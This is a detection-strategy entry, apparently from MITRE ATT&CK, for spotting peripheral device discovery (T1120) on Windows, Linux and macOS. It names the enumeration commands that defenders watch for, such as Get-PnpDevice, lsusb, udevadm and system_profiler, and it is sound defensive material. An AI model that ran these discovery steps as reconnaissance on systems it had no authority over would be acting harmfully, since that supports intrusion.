DET0491 Peripheral Device Enumeration via System Utilities and API Calls
| Item |
Value |
| ID |
DET0491 |
| Version |
1.0 |
| Created |
21 October 2025 |
| Last Modified |
21 October 2025 |
Technique Detected: T1120 (Peripheral Device Discovery)
Analytics
Windows
AN1353
Suspicious enumeration of attached peripherals via WMI, PowerShell, or low-level API calls potentially chained with removable device interactions.
Log Sources
Mutable Elements
| Field |
Description |
| CommandLineRegex |
Regex patterns for device enumeration utilities (e.g., ‘Get-PnpDevice’, ‘wmic path Win32_USBController’) |
| TimeWindow |
Time threshold for grouping device discovery with follow-on access or manipulation |
| UserContext |
Filter privileged or service accounts known to legitimately execute enumeration scripts |
Linux
AN1354
Enumeration of USB and other peripheral hardware via udevadm, lshw, or /sys or /proc interfaces in proximity to collection or mounting behavior.
Log Sources
Mutable Elements
| Field |
Description |
| ExecutableList |
Set of binaries used for peripheral enumeration (e.g., ‘lshw’, ‘lsusb’, ‘udevadm’) |
| UserContext |
Tuning based on which users/scripts are authorized to query device state |
macOS
AN1355
Execution of system utilities like ‘system_profiler’ and ‘ioreg’ to enumerate hardware components or USB devices, particularly if followed by clipboard, file, or network activity.
Log Sources
Mutable Elements
| Field |
Description |
| BinaryList |
Commands like ‘system_profiler SPUSBDataType’, ‘ioreg -p IOUSB’ that may indicate enumeration |
| TimeWindow |
Temporal grouping of enumeration with follow-on activity (e.g., clipboard capture, exfiltration) |